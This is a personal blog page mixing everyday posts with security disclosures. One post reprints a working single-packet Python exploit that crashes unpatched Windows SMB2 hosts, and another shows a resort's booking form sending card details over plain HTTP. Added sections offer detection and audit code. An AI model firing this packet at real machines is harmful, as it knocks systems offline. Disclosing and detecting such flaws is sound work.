
nuxx.net Posts

MS09-0??

As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. The code below, which works under Python 2.6 on Windows, was very slightly adapted from this post to Full Disclosure.

import socket
host = "127.0.0.1", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
s.close()

UPDATE: Microsoft has posted 975497 – Vulnerabilities in SMB Could Allow Remote Code Execution which states:

Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

I’m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial.

UPDATE 2: This was fixed on 13-Oct-2009 in MS09-050.
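For anyone watching port 445 until the patch is deployed, the field annotated in the packet above can be checked directly. This is an added detection sketch, not code from the original post or from Microsoft: it parses the SMB1 header of a captured frame and flags a Negotiate Protocol request whose Process ID High is nonzero. The function names are hypothetical, the input is assumed to be a raw TCP payload starting with the NetBIOS session header, and the sample frames are constructed, header-only test data.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# SMB1 header (little-endian), following the 4-byte NetBIOS session header:
# magic, command, status, flags, flags2, pid_high, security, reserved,
# tid, pid_low, uid, mid
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")  # 32 bytes


def parse_smb1_header(frame):
    """Return (command, pid_high) for an SMB1 session message, else None."""
    if len(frame) < 4 + SMB1_HEADER.size or frame[0] != 0x00:
        return None  # too short, or not a NetBIOS session message
    fields = SMB1_HEADER.unpack_from(frame, 4)
    if fields[0] != SMB1_MAGIC:
        return None  # e.g. an SMB2 frame, which starts with \xfeSMB
    return fields[1], fields[5]


def is_suspicious_negotiate(frame):
    """Flag a Negotiate Protocol request whose Process ID High is nonzero."""
    parsed = parse_smb1_header(frame)
    if parsed is None:
        return False
    command, pid_high = parsed
    return command == SMB_COM_NEGOTIATE and pid_high != 0


def sample_header(command, pid_high):
    """Constructed test input: NetBIOS header plus a bare SMB1 header."""
    smb = SMB1_HEADER.pack(SMB1_MAGIC, command, 0, 0, 0, pid_high,
                           b"\x00" * 8, 0, 0, 0, 0, 0)
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    # The bytes "\x00\x26" in the post decode to 0x2600 as a little-endian field.
    for label, frame in [("pid_high=0", sample_header(0x72, 0)),
                         ("pid_high=0x2600", sample_header(0x72, 0x2600))]:
        print(label, "->", "ALERT" if is_suspicious_negotiate(frame) else "ok")
```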


Pig In An… Alley?

This morning when pulling up to the post office at 22 Mile and VanDyke I noticed a pig lying in the alley behind the strip mall which contains Bone Appetite Pet Supplies. A few years ago I saw this same pig, but at that time it was just nosing around in the grass next to a sign saying that the pig is supposed to be there.

UPDATE: Since people have asked, yes, the pig was alive. It was breathing, but appeared to be sleeping. The bowl on the right contained a bit of bright yellow liquid, which I hope was some sort of nutritional supplement or the remains of food. If I’m remembering correctly the other bowl was empty.


Trash Picking Reason #2264584

This free shelf here is another reason why one shouldn’t be afraid to take their neighbor’s trash right off the pile. While walking Roxie last night we saw this white shoe organizer sitting in the trash. One of the assembly screws had broken through the top, as if someone had stepped on it.

One new hole, moving the screw, and some wood glue and a clamp to repair the ripped out piece, and it’s quite nice again. Sure, these only cost $10 – $15, but free (and one less in the landfill) is even better. I really like shelves like this, as they are great for organizing small tools on a workbench or desk surface. There’s already one on my basement workbench and another on Danielle’s desk. This one on the garage workbench rounds it out nicely.


Artificial Sweeteners and Overeating

I’ve read a few things hinting that artificial sweeteners such as Aspartame (NutraSweet) and Saccharin cause an insulin response, leading to blood sugar drop and often overeating. While I don’t know enough to say how true it is, these three articles seem to support this:

Effects of artificial sweeteners on insulin release and cationic fluxes in rat pancreatic islets.

[…] Sodium saccharin (1.0-10.0 mM), sodium cyclamate (5.0-10.0 mM), stevioside (1.0 mM) and acesulfame-K (1.0-15.0 mM), all of which display a bitter taste, augmented insulin release from islets incubated in the presence of 7.0 mM D-glucose. In contrast, aspartame (1.0-10.0 mM), which is devoid of bitter taste, failed to affect insulin secretion. […]

A role for sweet taste: Calorie predictive relations in energy regulation by rats.

[…] We found that reducing the correlation between sweet taste and the caloric content of foods using artificial sweeteners in rats resulted in increased caloric intake, increased body weight, and increased adiposity, as well as diminished caloric compensation and blunted thermic responses to sweet-tasting diets. These results suggest that consumption of products containing artificial sweeteners may lead to increased body weight and obesity by interfering with fundamental homeostatic, physiological processes. […]

Sweet taste receptor expressed in pancreatic beta-cells activates the calcium and cyclic AMP signaling systems and stimulates insulin secretion.

[…] In these cells, artificial sweeteners such as sucralose, saccharin, and acesulfame-K increased insulin secretion and augmented secretion induced by glucose. […]

When I was rather young, eating anything containing NutraSweet would give me a pretty bad headache. While this doesn’t happen any more, I do wonder if it was related.


2009 Stony Creek XC Race

With today being the start of a long stretch of great weather, I set out to Stony Creek to watch Tailwind's 2009 Stony Creek XC race. Some friends were starting at 1pm, so leaving my house at noon I made quick work (for me) of the ~14.5 mile trip, arriving just before they started off. This route took me up to 24 Mile and Dequindre, along Parkdale, up to Letica Drive, then east along there and Sheldon, into one of Stony Creek’s rear entrances, then around two-track to the trailhead.

Once at the race I mostly hung out with folks, then snapped a few occasional photos of people. I would have headed off into the woods to grab actual photos of people, but since I’d left the memory card at home, I was only able to grab a few frames. These ended up being the following images:

· Bob, getting ready for the 2009 Stony XC Race, while Robert from Tailwind explains some things.
· Bill passing a guy riding Aerospokes while going into his second lap of the 2009 Stony XC Race.
· Bob, crossing the line to start his second lap at the 2009 Stony XC Race.
· Mike, crossing the finish line at the end of the 2009 Stony XC Race.
· Bob, crossing the finish line at the 2009 Stony XC Race.

After the race I headed back home via a slightly different route, heading out the main Stony Creek entrance, up the Macomb Orchard Trail to 24 Mile and Dequindre, then back the normal route home.

End result was just barely over 29 miles in 2:00:06 on an absolutely glorious Sunday.


Garland Resort’s Website is Very Insecure

Next month I’m going to be attending a wedding at Garland Resort in Michigan’s northern Lower Peninsula. When reserving a hotel room there I noticed that not only was the reservation system using plain old http, the form which accepts a credit card number is insecure. It then again uses HTTP when submitting the form:

<form name='frmRes1' method='post' Action='CCard1.asp?IRM=yes&BtrvID=4249' onSubmit='return NextPage()'>

Here’s an excerpt from a network capture of me submitting a page full of garbage info:

POST http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249 HTTP/1.1\r\n

Line-based text data: application/x-www-form-urlencoded
    [truncated] firstname=Test&phone1=987-555-1212&lastname=User&phone2=&address1=12345+No+Street&sob=WI&address2=&ccname=AMEX&city=Default&ccnum=1234567812345678&state=AZ&ccexp=01%2F12&zip=99901&cardid=555&country=&email=test%40example.com&pa

See that last line there? In case you don’t know, the & sign delineates the fields, and it’s a simple valuename=value pair. Therefore, ccnum=1234567812345678 is the garbage credit card number I submitted, cardid is the CVV2, ccexp is the expiration date, etc. This is very definitely not PCI compliant and is a thief’s dream if the victim were submitting this form across a sniffable public network.

Suffice to say, I phoned in my reservation. This is obviously not an ideal solution either, but at least I didn’t use that crap.
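The field breakdown above can be turned into a quick audit of a captured request. This is an added example, not part of the original post: it decodes a form body the way the post describes and reports which card fields crossed the wire over plain HTTP, masking the values so the report does not repeat them. The function names are hypothetical, the URL is the one in the capture, and the body is abridged from the capture, including its truncated last field.

```python
from urllib.parse import parse_qsl, urlsplit

# Field names as they appear in the capture; meanings as given in the post.
CARD_FIELDS = {"ccnum": "card number", "cardid": "CVV2",
               "ccexp": "expiration date"}

# Request URL from the capture and an abridged copy of its form body.
SAMPLE_URL = "http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249"
SAMPLE_BODY = ("firstname=Test&lastname=User&ccname=AMEX"
               "&ccnum=1234567812345678&ccexp=01%2F12&cardid=555"
               "&email=test%40example.com&pa")


def mask(value):
    """Hide a value; keep the last four characters only of long values."""
    keep = 4 if len(value) > 8 else 0
    return "*" * (len(value) - keep) + value[len(value) - keep:]


def cleartext_card_fields(request_url, body):
    """Return {field: (meaning, masked value)} for card data sent over HTTP.

    An HTTPS request returns an empty dict, because the body is not
    readable by someone sniffing the network.
    """
    if urlsplit(request_url).scheme.lower() != "http":
        return {}
    # '&' separates the fields and '=' splits name from value; a field cut
    # off by truncation (such as the trailing 'pa') is kept with an empty
    # value instead of raising an error.
    pairs = parse_qsl(body, keep_blank_values=True)
    return {name: (CARD_FIELDS[name], mask(value))
            for name, value in pairs if name in CARD_FIELDS}


if __name__ == "__main__":
    for name, (meaning, shown) in cleartext_card_fields(
            SAMPLE_URL, SAMPLE_BODY).items():
        print("%s (%s) sent in cleartext: %s" % (name, meaning, shown))
```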


In The Face!

Please excuse the poor quality photo, but it’s hard to take a macro photo of one’s own lip.

Today while riding back towards Rochester along the Paint Creek Trail with Bob, Erik, and Kristi, just before getting to the Tienken Road crossing I crossed paths with a large insect. While hitting, inhaling, or simply swallowing bugs is pretty common during late-summer riding, this was different. As soon as the bug hit my face I instinctively closed my mouth, which apparently trapped it between my lips.

In between that time and when I was able to pull it off my face (seconds, really) three quick bites or stings were applied to my lip. I’m not completely sure what it was, but the spindly, leggy feeling between my fingers and multiple punctures in such a short time leads me to believe that it was a wasp. It could have been a black fly or deer fly but I’ve never known them to bite so quickly.

At first the pain was like a sharp, stabbing cut, bothersome enough that I needed to stop for a few moments. After that it went down a bit, and now is still a deep ache, similar to both the pain of split open chapped lips and having bit one’s lip quite hard.

At least the ride tonight was really nice. We started out at Rochester Mills, then headed up Bald Mountain South Unit, rode most of the mountain bike trails, then (due to my misdirection) didn’t quite find the connector to the Lake Orion High School mountain bike trails before sunset threatened.
